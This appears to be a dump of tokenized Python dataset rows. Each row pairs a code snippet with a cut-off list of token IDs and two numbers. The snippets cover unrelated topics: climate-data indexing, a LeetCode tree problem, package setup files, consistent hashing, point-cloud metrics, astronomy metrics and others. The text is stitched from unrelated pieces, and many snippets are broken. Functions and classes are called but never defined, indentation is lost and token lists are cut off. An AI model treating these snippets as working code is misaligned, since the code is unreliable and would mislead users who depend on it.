rootDir = f'/scratch/ms/nl/nm6/cmorised-results/EC-EARTH3P-HR-HighResMIP-highres-future/s2hh/CMIP6/HighResMIP/'
print(store)
print(os.listdir(rootDir))
for dirName, subdirList, fileList in tqdm(os.walk(rootDir)):
if not any(fname.endswith('.nc') for fname in fileList): continue
os.path.normpath(dirName).split(os.path.sep)
mip_era = 'CMIP6'
name_list = os.path.normpath(dirName).split(os.path.sep)[-9:]
[activity_id, institution_id, source_id, experiment_id, member_id, table_id, variable_id, grid_label, version] = name_list
nc_path = dirName+'/*.nc'
writer.writerow(['CMIP6']+name_list+2*['']+[dirName+'/*.nc'])
csv_file.close() | [
11748,
28686,
198,
11748,
269,
21370,
198,
6738,
256,
80,
36020,
13,
2306,
261,
1258,
2070,
1330,
256,
80,
36020,
198,
198,
40664,
62,
7753,
796,
1280,
7203,
721,
76,
86,
69,
62,
13227,
62,
1416,
36722,
13,
40664,
1600,
366,
86,
494... | 2.29979 | 477 |
"""
url: https://leetcode.com/problems/longest-univalue-path/
* 가장 긴 동일 값의 경로
동일한 값을 지닌 가장 긴 경로를 찾아라.
- Example 1
Input :
5
/ \
4 5
/ \ \
1 1 5
Output : 2
Explaination : 루트에서 오른쪽 노드 끝까지 5->5->5로 가장 긴 이동 거리가 2이다.
- Example 2
Input :
1
/ \
4 5
/ \ \
4 4 5
Output : 2
Explaination : 왼쪽 리프 노드 4에서 형제 노드 4까지 4->4->4로 가장 긴 이동 거리가 2이다.
"""
# Definition for a binary tree node.
if __name__ == '__main__':
# print(Solution().longestUnivaluePath(
# TreeNode(5, TreeNode(4, TreeNode(1), TreeNode(1)), TreeNode(5, None, TreeNode(5)))),
# "||",
# 2
# )
print(Solution().longestUnivaluePath(
TreeNode(4, TreeNode(4, TreeNode(4), TreeNode(4)), TreeNode(4))),
"||",
3
)
"""
[시작 체크 리스트]
[] 1시간 지났으나 발상 불가 또는 아예 다른 길
[✓] 코드 50% 정도 완성
[] 1시간 보다 더 걸려서 코드 완성
[] 코드는 다 돌아가는데 효율성에서 걸림
[] 코드 완성
[완료 후 체크 리스트]
[] 아예 모르겠음
[] 중간 정도 이해함
[✓] 완벽히 이해함
""" | [
37811,
198,
6371,
25,
3740,
1378,
293,
316,
8189,
13,
785,
14,
1676,
22143,
14,
6511,
395,
12,
403,
2473,
518,
12,
6978,
14,
198,
9,
220,
166,
108,
222,
168,
252,
98,
220,
166,
116,
112,
31619,
237,
247,
35975,
120,
220,
166,
10... | 1.093923 | 905 |
#!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
version = '1.0.0'
setup(name='python-draytonwiser-api',
version=version,
description='Python API and command line tool for talking to Drayton Wiser Thermostat',
url='',
author='',
author_email='',
license='MIT',
install_requires=['requests>=2.0'],
packages=['draytonwiser'],
zip_safe=True) | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
11748,
28686,
198,
11748,
25064,
198,
198,
28311,
25,
198,
220,
220,
220,
422,
900,
37623,
10141,
1330,
9058,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
422,
1233,
26791,
1... | 2.455319 | 235 |
from setuptools import setup
setup(
name='flowsa',
version='0.0.1',
packages=['flowsa'],
package_dir={'flowsa': 'flowsa'},
package_data={'flowsa': [
"data/*.*", "output/*.*"]},
include_package_data=True,
install_requires=[
'fedelemflowlist @ git+https://github.com/USEPA/Federal-LCA-Commons-Elementary-Flow-List',
'pandas>=1.0',
'pip>=9',
'setuptools>=41',
'pyyaml>=5.3',
'pyarrow==0.15',
'requests>=2.22.0',
'appdirs>=1.4.3',
'pycountry>=19.8.18',
'xlrd>=1.2.0',
'requests_ftp==0.3.1',
'tabula-py>=2.1.1'
],
url='https://github.com/USEPA/FLOWSA',
license='CC0',
author='Wesley Ingwersen',
author_email='ingwersen.wesley@epa.gov',
classifiers=[
"Development Status :: 1 - Alpha",
"Environment :: IDE",
"Intended Audience :: Science/Research",
"License :: CC0",
"Programming Language :: Python :: 3.x",
"Topic :: Utilities",
],
description='Complies and provides a standardized list of elementary flows and flow mappings for life cycle assessment data'
)
| [
6738,
900,
37623,
10141,
1330,
9058,
198,
198,
40406,
7,
198,
220,
220,
220,
1438,
11639,
44041,
64,
3256,
198,
220,
220,
220,
2196,
11639,
15,
13,
15,
13,
16,
3256,
198,
220,
220,
220,
10392,
28,
17816,
44041,
64,
6,
4357,
198,
2... | 2.106498 | 554 |
# -*- coding:utf-8 -*-
"""
author comger@gmail.com
Consisten hash
"""
from hashlib import md5
from bisect import bisect_right
class ConsistentHash(object):
"""
算法思路:
1. 在N个机器中、每台M个节点、N*M 个节点形成节点环
2. 计算每个机器拥有的节点Node
3. 新内容key添加时,get_node(key)获取key被分配的node;及get_host(key)获取key 被分配到的机器
* 节点的引入:保证每台机器负载均衡
"""
if __name__ == '__main__':
from random import sample
from string import letters
'''
loop = 100000
hosts = ["192.168.1.%d" % i for i in xrange(1, 10)]
ch = ConsistentHash(hosts,replicas=100)
rnd_key = lambda: "".join(sample(letters, 10))
count = {}
for i in xrange(loop):
host = ch.get_host(rnd_key())
count[host] = count[host] + 1 if host in count else 1
avg = loop / len(hosts)
for h in sorted(count.iterkeys()):
c = count[h]
print("{0:15} {1:8} {2:8.2f}%".format(h, c, float(c) / avg * 100))
if c< avg*0.6:
print("ERROR", h,c)
'''
dh = 'asdfasd'
hosts = ["192.168.1.%d" % i for i in xrange(1, 5)]
ch = ConsistentHash(hosts,replicas=10)
print(ch.get_host(dh))
| [
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
1772,
401,
1362,
31,
14816,
13,
785,
198,
220,
220,
220,
3515,
396,
268,
12234,
220,
198,
37811,
198,
6738,
12234,
8019,
1330,
45243,
20,
198,
... | 1.642959 | 703 |
import sys
import operator
func_by_op = {
'*': operator.mul,
'+': operator.add
}
if __name__ == '__main__':
print(solve(sys.stdin.read()))
| [
11748,
25064,
198,
11748,
10088,
198,
198,
20786,
62,
1525,
62,
404,
796,
1391,
198,
220,
705,
9,
10354,
10088,
13,
76,
377,
11,
198,
220,
705,
10,
10354,
10088,
13,
2860,
198,
92,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
... | 2.370968 | 62 |
#
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import event
import threading
import node
import project
import gui.wx.GridEntry
| [
2,
198,
2,
27975,
38162,
9947,
25,
198,
2,
220,
220,
220,
220,
220,
220,
383,
1004,
1655,
261,
3788,
318,
15069,
5816,
198,
2,
220,
220,
220,
220,
220,
220,
383,
1446,
14602,
82,
4992,
5136,
11,
4689,
449,
33011,
11,
7257,
198,
... | 2.815126 | 119 |
import numpy as np
from numpy.linalg import norm
from shapely.geometry import Polygon
from copy import deepcopy
import open3d
from tofnet.pointcloud.utils import rotate, transform_with_conf
from tofnet.pointcloud.visualize import visualize_pointcloud
from tofnet.annotations.segmentation import find_segmentation, find_z
def floor_similarity(ground_cfg, pred_cfg, eps=1.e-8):
"""Uses cosine similarity to compare camera configs.
Arguments:
ground_cfg: ground truth config containing a "camera" section with
inclination and lateral_inclination
pred_cfg: prediction (cfr ground_cfg)
eps: epsilon value for cosine similarity metric
Returns:
similarity: cosine similarity
"""
normal = np.array([1,1,1])
ground_vec = _rotate_from_cfg(ground_cfg, normal)
pred_vec = _rotate_from_cfg(pred_cfg, normal)
similarity = np.degrees(np.arccos(np.clip(np.dot(ground_vec, pred_vec) / max(norm(ground_vec)*norm(pred_vec), eps), -1,1)))
return similarity
def bed_similarity(ground_cfg, pred_cfg):
"""Compute 2d IoU for the bed, with common camera config."""
raise NotImplementedError()
def bprojIoU(gt_cfg, pred_cfg):
""" Computes the bounding box IoU from 2 different configs while accounting for
differences in floor rotation
"""
from shapely import geometry
res = []
for cfg in [gt_cfg, pred_cfg]:
height = cfg["camera"].get("height", 2.6)
angles = (
180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"],
cfg["bed"]["orientation"]
)
alpha, beta, gamma = (np.radians(a) for a in angles)
center = [cfg["bed"]["centerX"], cfg["bed"]["centerY"]]
points = get_bbox_points(cfg)
points = rotate(-gamma, points)
points += center
points3d = np.zeros((len(points), 3))
points3d[:,:2] = points
points3d[:,-1] = points3d[:,-1]-height
points3d = rotate(-beta, points3d, axis='y')
points3d = rotate(-np.pi, points3d, axis='z')
points3d = rotate(-alpha, points3d, axis='x')
res.append(points3d)
gt_points, pred_points = res
# compute floor normal
N = np.cross(gt_points[1,:]-gt_points[0,:], gt_points[3,:]-gt_points[0,:])
d = N@gt_points[0,:]
# project pred on that plane
T = (d - pred_points@N)/(N@N)
projected_pred_points = pred_points + np.expand_dims(T, axis=-1)*np.expand_dims(N, axis=0)
# compute iou
gt_poly = geometry.Polygon(gt_points[:,:2])
pr_poly = geometry.Polygon(projected_pred_points[:,:2])
iou = gt_poly.intersection(pr_poly).area/gt_poly.union(pr_poly).area
return iou
def cIoU(gt_mask, pred_mask, c):
""" Computes the image-wise pixel-based IoU
"""
pok = pred_mask==c
gok = gt_mask==c
tp = np.sum(gok & pok)
fp = np.sum((~gok) & pok)
fn = np.sum(gok & (~pok))
return tp/(tp+fn+fp)
def full_similarity(pcd, gt_cfg, pred_cfg, bed_class=2, sample=None, use_z=False):
"""Compute point-set IoU to have a complete view of bbox similarities."""
gt_pcd = np.nan_to_num(deepcopy(pcd)["points"])
pred_pcd = np.nan_to_num(deepcopy(pcd)["points"])
# Pixel IoU
## Project pred_bed on pred_floor -> pred_rect
shape = pcd["shape"][::-1]
gt_pcd = transform_with_conf(gt_pcd, gt_cfg, shape)
pred_pcd = transform_with_conf(pred_pcd, pred_cfg, shape)
if use_z:
gt_z = min(find_z(gt_pcd, end=1.4)+0.2, 1.35)
mask_z = min(find_z(pred_pcd, end=1.4)+0.2, 1.35)
else:
gt_z, mask_z = 1.35, 1.35
## Annotate pixels -> compare -> IoU
gt_mask = find_segmentation(gt_pcd, gt_cfg["bed"]["width"], gt_cfg["bed"]["length"], z=gt_z)
pred_mask = find_segmentation(pred_pcd, pred_cfg["bed"]["width"], pred_cfg["bed"]["length"], z=mask_z)
## Rotation cossim
cossim = np.degrees(np.arccos(np.cos(np.radians(
gt_cfg["bed"]["orientation"] - pred_cfg["bed"]["orientation"]
))))
err_center = np.sqrt(
(gt_cfg["bed"]["centerX"] - pred_cfg["bed"]["centerX"])**2 +
(gt_cfg["bed"]["centerY"] - pred_cfg["bed"]["centerY"])**2
)
err_len = gt_cfg["bed"]["length"] - pred_cfg["bed"]["length"]
err_width = gt_cfg["bed"]["width"] - pred_cfg["bed"]["width"]
divers_errors = (cossim, err_center, err_len, err_width)
iou_proj = bprojIoU(gt_cfg, pred_cfg)
pnts = pred_pcd[pred_mask==bed_class]
pnts = np.mean(np.linalg.norm(pnts, axis=-1))
return (0, iou_proj), divers_errors, pred_mask, gt_mask, pnts | [
11748,
299,
32152,
355,
45941,
198,
6738,
299,
32152,
13,
75,
1292,
70,
1330,
2593,
198,
6738,
5485,
306,
13,
469,
15748,
1330,
12280,
14520,
198,
6738,
4866,
1330,
2769,
30073,
198,
11748,
1280,
18,
67,
198,
198,
6738,
284,
69,
3262,... | 2.240686 | 2,040 |
from django.contrib import messages
from django.db.models import (
Case,
When,
IntegerField,
Count,
F,
Sum,
Prefetch,
)
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from trainings.filters import (
TraineeFilter,
)
from trainings.forms import (
TrainingProgressForm,
BulkAddTrainingProgressForm,
BulkDiscardProgressesForm,
)
from workshops.base_views import (
AMYCreateView,
AMYUpdateView,
AMYDeleteView,
AMYListView,
RedirectSupportMixin,
PrepopulationSupportMixin,
)
from workshops.models import (
Badge,
Event,
Person,
Task,
TrainingProgress,
TrainingRequirement,
)
from workshops.util import (
get_pagination_items,
admin_required,
OnlyForAdminsMixin,
)
# ------------------------------------------------------------
# Instructor Training related views
@admin_required
| [
6738,
42625,
14208,
13,
3642,
822,
1330,
6218,
198,
6738,
42625,
14208,
13,
9945,
13,
27530,
1330,
357,
198,
220,
220,
220,
8913,
11,
198,
220,
220,
220,
1649,
11,
198,
220,
220,
220,
34142,
15878,
11,
198,
220,
220,
220,
2764,
11,
... | 2.857585 | 323 |
# Metric for kilonova detectability based on GW170817 SED used in Scolnic et
# al. 2018 and Setzer et al. 2019. The chosen detection criteria are related to
# those used in the LSST DESC white paper detectability work and the two
# references above.
#
# Contact for this code:
# christian.setzer@fysik.su.se
from pathlib import Path
from .transientAsciiSEDMetric import transientAsciiSEDMetric
__all__ = ["GW170817DetMetric"]
base_path = Path(__file__).parent
class GW170817DetMetric(transientAsciiSEDMetric):
"""
Wrapper metric class for GW170817-like kilonovae based on the
transientAsciiSEDMetric. Defaults are set to those corresponding to similar
detection criteria used in Scolnic et al. 2018 and Setzer et al. 2019.
However, due to the simplified nature of transient distribution for
computing this metric, the criteria have been altered to only include
criteria two and three. The chosen redshift is at the approximate mean
redshift of the detected cosmological redshift distribution shown in
Setzer et al. 2019.
Parameters
-----------
ascii_file : str, optional
The ascii file containing the inputs for the SED. The file must
contain three columns - ['phase', 'wave', 'flux'] -
of phase/epoch (in days), wavelength (Angstroms), and
flux (ergs/s/Angstrom). Default, data provided with sims_maf_contrib.
metric_name : str, optional
Name of the metric, can be overwritten by user or child metric.
z: float, optional
Cosmological redshift at which to consider observations of the
tranisent SED. Default 0.08.
num_filters : int, optional
Number of filters that need to be observed for an object to be
counted as detected. Default 2. (if num_per_lightcurve is 0, then
this will be reset to 0).
filter_time : float, optional
The time within which observations in at least num_filters are
required (in days). Default 25.0 days.
num_phases_to_run : int, optional
Sets the number of phases that should be checked.
One can imagine pathological cadences where many objects pass the
detection criteria, but would not if the observations were offset
by a phase-shift. Default 5.
"""
def __init__(
self,
ascii_file=(base_path / "../data/DECAMGemini_SED.txt").resolve(),
metric_name="GW170817DetMetric",
z=0.08,
num_filters=2,
filter_time=25.0,
num_phases_to_run=5,
**kwargs
):
"""
"""
super(GW170817DetMetric, self).__init__(
ascii_file=ascii_file,
metric_name=metric_name,
z=z,
num_filters=num_filters,
filter_time=filter_time,
num_phases_to_run=num_phases_to_run,
**kwargs
)
| [
2,
3395,
1173,
329,
8769,
261,
10071,
4886,
1799,
1912,
319,
27164,
1558,
2919,
1558,
311,
1961,
973,
287,
1446,
349,
6988,
2123,
198,
2,
435,
13,
2864,
290,
5345,
9107,
2123,
435,
13,
13130,
13,
383,
7147,
13326,
9987,
389,
3519,
2... | 2.604545 | 1,100 |
#!/usr/bin/env python3.3
# -*- coding: utf-8 -*-
#
# Read configuration file or return default values
#
# Copyright (c) 2015 NorthernSec
# Copyright (c) 2015 Pieter-Jan Moreels
# This software is licensed under the Original BSD License
# Imports
import os
runpath=os.path.dirname(os.path.realpath(__file__))
import configparser
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
13,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
4149,
8398,
2393,
393,
1441,
4277,
3815,
198,
2,
198,
2,
15069,
357,
66,
8,
1853,
197,
404... | 2.946429 | 112 |
n = 1000
a = list(range(n))
b = dict.fromkeys(range(n))
n = 10
items = range(n)
o_one(items) # 1 operation
o_n(items) # n operations
o_n_squared(items) # n*n = 10 * 10 = 100 operations
| [
77,
796,
8576,
198,
64,
796,
1351,
7,
9521,
7,
77,
4008,
198,
65,
796,
8633,
13,
6738,
13083,
7,
9521,
7,
77,
4008,
198,
198,
77,
796,
838,
198,
23814,
796,
2837,
7,
77,
8,
198,
78,
62,
505,
7,
23814,
8,
197,
2,
352,
4905,
... | 2.308642 | 81 |
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import time
import threading
from nose.tools import assert_equals, assert_raises
from ..backends.base import BackendBase
from ..apps.base import AppBase
from ..router import Router
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
43907,
25,
257,
72,
40379,
28,
19,
39747,
28,
19,
2123,
1509,
28,
19,
628,
198,
11748,
640,
198,
11748,
4704,
278,
198,
6738,
9686,
13,
31391,
1330,
6818,
62,
4853,
874,
11,
681... | 3.090909 | 77 |
"""
IOPing plugin for Diamond.
Author: Antti Jaakkola
#### Dependencies
* ioping
Create /usr/share/diamond/collectors/ioping directory and copy this plugin to it.
mkdir /usr/share/diamond/collectors/ioping
cp ioping/ioping.py /usr/share/diamond/collectors/ioping/
Create config file /etc/diamond/collectors/IOPing.conf with content:
enabled=True
Enjoy statistics!
"""
import diamond.collector
import subprocess
| [
198,
37811,
198,
198,
40,
3185,
278,
13877,
329,
13566,
13,
198,
198,
13838,
25,
3738,
20259,
13790,
461,
74,
5708,
198,
198,
4242,
37947,
3976,
198,
1635,
1312,
15816,
628,
198,
16447,
1220,
14629,
14,
20077,
14,
67,
8446,
14,
33327,... | 3.007042 | 142 |
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Constants and functions for maze task."""
from typing import List, Tuple
from gfsa import automaton_builder
from gfsa import graph_types
from gfsa.datasets import graph_bundle
from gfsa.datasets.mazes import maze_schema
DIRECTION_ORDERING = "LRUD"
def maze_primitive_edges(
maze_graph
):
"""Build a graph bundle for a given maze.
Args:
maze_graph: Encoded graph representing the maze.
Returns:
List of edges corresponding to primitive actions in the maze.
"""
primitives = []
for node_id, node_info in maze_graph.items():
for i, direction in enumerate(DIRECTION_ORDERING):
out_key = graph_types.OutEdgeType(f"{direction}_out")
if out_key in node_info.out_edges:
dest, = node_info.out_edges[out_key]
primitives.append((node_id, dest.node_id, i))
else:
primitives.append((node_id, node_id, i))
return primitives
SCHEMA = maze_schema.build_maze_schema(2)
# Backtracking doesn't make sense for maze environment.
BUILDER = automaton_builder.AutomatonBuilder(SCHEMA, with_backtrack=False)
PADDING_CONFIG = graph_bundle.PaddingConfig(
static_max_metadata=automaton_builder.EncodedGraphMetadata(
num_nodes=256, num_input_tagged_nodes=512),
max_initial_transitions=512,
max_in_tagged_transitions=2048,
max_edges=1024)
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
12131,
383,
3012,
4992,
46665,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
... | 2.92054 | 667 |
from __future__ import absolute_import, division, print_function
from spotfinder.applications.wrappers import DistlOrganizer
"Later go back and refactor this module and signal_strength to avoid code duplication."
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
6738,
4136,
22805,
13,
1324,
677,
602,
13,
29988,
11799,
1330,
4307,
75,
26121,
7509,
198,
198,
1,
18602,
467,
736,
290,
1006,
11218,
428,
8265,
290,
... | 4.196078 | 51 |
import json
import os
import numpy
from torch.utils.data import DataLoader
from config import DEVICE, ATT_PATH
from logger.training import predict
from modules.nn.dataloading import WordDataset, CharDataset
from utils.nlp import twitter_preprocess
from utils.train import load_embeddings, get_pipeline
def predictions(task, model, config, data, label_transformer=None,
batch_size=128, preprocessor=None, name=None):
"""
Args:
task (): available tasks
- "clf": multiclass classification
- "bclf": binary classification
- "mclf": multilabel classification
- "reg": regression
model ():
config ():
data ():
label_transformer ():
batch_size ():
num_workers ():
Returns:
"""
word2idx = None
if config["op_mode"] == "word":
word2idx, idx2word, embeddings = load_embeddings(config)
# dummy scores if order to utilize Dataset classes as they are
dummy_y = [0] * len(data)
if config["op_mode"] == "word":
if preprocessor is None:
preprocessor = twitter_preprocess()
dataset = WordDataset(data, dummy_y, word2idx,
name=name,
preprocess=preprocessor,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
elif config["op_mode"] == "char":
print("Building char-level datasets...")
dataset = CharDataset(data, dummy_y, name=name,
label_transformer=label_transformer)
loader = DataLoader(dataset, batch_size)
else:
raise ValueError("Invalid op_mode")
model.to(DEVICE)
pipeline = get_pipeline(task=task, eval=True)
avg_loss, (dummy_y, pred), posteriors, attentions = predict(model,
pipeline,
loader,
task,
"eval")
return pred, posteriors, attentions, loader.dataset.data
| [
11748,
33918,
198,
11748,
28686,
198,
198,
11748,
299,
32152,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
17401,
198,
198,
6738,
4566,
1330,
5550,
27389,
11,
26195,
62,
34219,
198,
6738,
49706,
13,
34409,
1330,
4331,
198,
6738,
1... | 1.996441 | 1,124 |
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
"""
modified to fit dataset size
"""
class ResNeXtBottleneck(nn.Module):
"""
RexNeXt bottleneck type C (https://github.com/facebookresearch/ResNeXt/blob/master/models/resnext.lua)
"""
def __init__(self, in_channels, out_channels, stride, cardinality,
base_width, widen_factor):
""" Constructor
Args:
in_channels: input channel dimensionality
out_channels: output channel dimensionality
stride: conv stride. Replaces pooling layer.
cardinality: num of convolution groups.
base_width: base number of channels in each group.
widen_factor: factor to reduce the input dimensionality
before convolution.
"""
super(ResNeXtBottleneck, self).__init__()
width_ratio = out_channels / (widen_factor * 64.)
D = cardinality * int(base_width * width_ratio)
self.conv_reduce = nn.Conv2d(in_channels, D, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_reduce = nn.BatchNorm2d(D)
self.conv_conv = nn.Conv2d(D, D, kernel_size=3, stride=stride,
padding=1, groups=cardinality, bias=False)
self.bn = nn.BatchNorm2d(D)
self.conv_expand = nn.Conv2d(D, out_channels, kernel_size=1,
stride=1, padding=0, bias=False)
self.bn_expand = nn.BatchNorm2d(out_channels)
self.shortcut = nn.Sequential()
if in_channels != out_channels:
self.shortcut.add_module('shortcut_conv',
nn.Conv2d(in_channels, out_channels,
kernel_size=1, stride=stride,
padding=0,
bias=False))
self.shortcut.add_module('shortcut_bn', nn.BatchNorm2d(out_channels))
class CifarResNeXt(nn.Module):
"""
ResNext optimized for the Cifar dataset, as specified in
https://arxiv.org/pdf/1611.05431.pdf
"""
def __init__(self, cardinality, depth, nlabels, base_width, widen_factor=4):
""" Constructor
Args:
cardinality: number of convolution groups.
depth: number of layers.
nlabels: number of classes
base_width: base number of channels in each group.
widen_factor: factor to adjust the channel dimensionality
"""
super(CifarResNeXt, self).__init__()
self.cardinality = cardinality
self.depth = depth
self.block_depth = (self.depth - 2) // 9
self.base_width = base_width
self.widen_factor = widen_factor
self.nlabels = nlabels
self.output_size = 64
self.stages = [64, 64 * self.widen_factor, 128 * self.widen_factor, 256 * self.widen_factor]
self.conv_1_3x3 = nn.Conv2d(3, 64, 3, 1, 1, bias=False)
self.bn_1 = nn.BatchNorm2d(64)
self.stage_1 = self.block('stage_1', self.stages[0], self.stages[1], 1)
self.stage_2 = self.block('stage_2', self.stages[1], self.stages[2], 2)
self.stage_3 = self.block('stage_3', self.stages[2], self.stages[3], 2)
self.classifier = nn.Linear(self.stages[3], nlabels)
nn.init.kaiming_normal(self.classifier.weight)
for key in self.state_dict():
if key.split('.')[-1] == 'weight':
if 'conv' in key:
nn.init.kaiming_normal(self.state_dict()[key], mode='fan_out')
if 'bn' in key:
self.state_dict()[key][...] = 1
elif key.split('.')[-1] == 'bias':
self.state_dict()[key][...] = 0
def block(self, name, in_channels, out_channels, pool_stride=2):
""" Stack n bottleneck modules where n is inferred from the depth of the network.
Args:
name: string name of the current block.
in_channels: number of input channels
out_channels: number of output channels
pool_stride: factor to reduce the spatial dimensionality in the first bottleneck of the block.
Returns: a Module consisting of n sequential bottlenecks.
"""
block = nn.Sequential()
for bottleneck in range(self.block_depth):
name_ = '%s_bottleneck_%d' % (name, bottleneck)
if bottleneck == 0:
block.add_module(name_, ResNeXtBottleneck(in_channels,
out_channels,
pool_stride,
self.cardinality,
self.base_width,
self.widen_factor))
else:
block.add_module(name_,
ResNeXtBottleneck(out_channels, out_channels,
1, self.cardinality,
self.base_width,
self.widen_factor))
return block
class Bottleneck(nn.Module):
'''Dual Path Networks in PyTorch.'''
# test()
| [
11748,
10688,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
628,
198,
37811,
198,
41771,
284,
4197,
27039,
2546,
198,
37811,
628,
198,
4871,
1874,
8199,
55,
83,
28653,
... | 1.89595 | 2,864 |
import argparse
import logging
import os
import platform
import shutil
import subprocess
logging.getLogger(__name__).addHandler(logging.NullHandler())
if __name__ == '__main__':
_main_cmdline()
| [
11748,
1822,
29572,
198,
11748,
18931,
198,
11748,
28686,
198,
11748,
3859,
198,
11748,
4423,
346,
198,
11748,
850,
14681,
628,
198,
6404,
2667,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
737,
2860,
25060,
7,
6404,
2667,
13,
35067,
25060... | 3.058824 | 68 |
from __future__ import print_function
import unittest
import doctest
import os
import commands
import cPickle
from StringIO import StringIO
import vcf
from vcf import utils
suite = doctest.DocTestSuite(vcf)
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFreebayesOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamtoolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestWriterDictionaryMeta))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestTabix))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestOpenMethods))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFilter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kg))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kgSites))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGoNL))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamplesSpace))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestMixedFiltering))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRecord))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestCall))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRegression))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestVcfSpecs))
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
11748,
555,
715,
395,
198,
11748,
10412,
395,
198,
11748,
28686,
198,
11748,
9729,
198,
11748,
269,
31686,
293,
198,
6738,
10903,
9399,
1330,
10903,
9399,
198,
198,
11748,
410,
12993,
... | 2.858347 | 593 |
from utils import *
import subprocess
import copy
from project import Project
from codegen.caravel_codegen import generate_openlane_files
from codegen.allocator import allocate_macros
REQUIRED_KEYS_GROUP = ["projects", "caravel", "lvs"]
class Collection(object):
"""
* generate an index.md with a section for each project
- title, author, description, link, picture
* could also create the info.yaml file for efabless
* tile all images for final image
"""
| [
6738,
3384,
4487,
1330,
1635,
198,
11748,
850,
14681,
198,
11748,
4866,
198,
6738,
1628,
1330,
4935,
198,
6738,
2438,
5235,
13,
66,
3301,
626,
62,
8189,
5235,
1330,
7716,
62,
9654,
33533,
62,
16624,
198,
6738,
2438,
5235,
13,
32332,
1... | 3.054878 | 164 |
from .ctc_loss import get_loss
| [
6738,
764,
310,
66,
62,
22462,
1330,
651,
62,
22462,
198
] | 2.818182 | 11 |
from wagtail.wagtailcore.permission_policies import OwnershipPermissionPolicy
from wagtail.wagtaildocs.models import Document, get_document_model
permission_policy = OwnershipPermissionPolicy(
get_document_model(),
auth_model=Document,
owner_field_name='uploaded_by_user'
)
| [
6738,
266,
363,
13199,
13,
86,
363,
13199,
7295,
13,
525,
3411,
62,
79,
4160,
444,
1330,
33147,
1056,
5990,
3411,
36727,
198,
6738,
266,
363,
13199,
13,
86,
363,
8326,
688,
420,
82,
13,
27530,
1330,
16854,
11,
651,
62,
22897,
62,
... | 2.969072 | 97 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import re
RUNNING = "RUNNING"
SUCCEEDED = "SUCCEEDED"
QUEUED = "QUEUED"
FAILED = "FAILED"
CANCELLED = "CANCELLED"
S3 = "s3://"
S3A = "s3a://"
| [
2,
198,
2,
49962,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
198,
2,
393,
517,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
198,
2,
9387,
351,
428,
670,
329,
3224,
1321,
198,
2,
5115,
6634,
9238,
13,
220,
... | 3.391459 | 281 |
